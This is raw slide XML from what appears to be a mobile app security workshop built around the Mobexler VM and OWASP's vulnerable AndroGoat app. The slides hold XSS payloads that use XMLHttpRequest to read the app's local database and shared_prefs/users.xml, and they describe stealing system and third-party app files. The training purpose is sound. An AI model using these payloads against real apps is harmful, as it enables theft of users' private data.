            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>shared_prefs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>users.xml"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="78A960"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.responseText</a:t>
            </a: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t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"GET"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="444444"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"file:///data/data/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>owasp.sat.agoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/databases/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>aGoat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>",</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="78A960"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() ;alert (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.responseText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a: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t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="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7978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Data Exfiltration via XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> App Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>payloads</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>those</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>therefore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>forward</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>hence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>proving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>exfiltration </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> possible:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1"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6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indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>For this workshop, we are going to use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>Mobexler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> Virtual Machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Download link: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://mobexler.com/download.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>mobexler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>/12345</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>Mobexler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t> is a Mobile Application Penetration Testing Platform Similar to a Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Focused on mobiles apps: Android and iOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Local Setup Guide : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.randorisec.fr/setting-up-mobexler-vmware-androidstudio/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-360000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>Web-based Lab : http://YOUR_IP:8080/guacamole</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="160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err="1"/>
              <a:t>Mobexler</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6" name="Picture 4"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94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4FC059-B524-8C95-711B-1831989CBA73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1076608" y="1230833"/>
            <a:ext cx="7187300" cy="5069816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1045700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Data Exfiltration via XSS - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Stealing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> System &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Third</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Party App Files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> note </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> issue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>limited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>affected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> app, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> possible to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>some</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> system files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>well</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> apps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>that</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>allow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>reading</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> certain files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>their</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>storage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>. Of course, if the app has SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>including</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> SD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Card</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> files </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> apps.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Assuming</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> Agent App</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
